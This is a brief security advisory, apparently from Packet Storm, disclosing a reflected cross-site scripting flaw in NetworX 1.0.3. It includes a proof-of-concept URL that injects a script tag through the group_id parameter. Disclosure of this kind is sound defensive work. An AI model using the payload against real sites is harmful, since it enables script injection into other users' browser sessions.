NetworX version 1.0.3 suffers from a cross site scripting vulnerability.
7cffea4f3740a93c40294e31e420f92b4d270988f21988671735f95661c24614------------------------------------------------------------------------
Software................NetworX 1.0.3
Vulnerability...........Reflected XSS
Download................http://sourceforge.net/projects/networx/
Release Date............7/5/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
An XSS vulnerability in NetworX 1.0.3 can be exploited to
execute arbitrary JavaScript.
--PoC--
http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed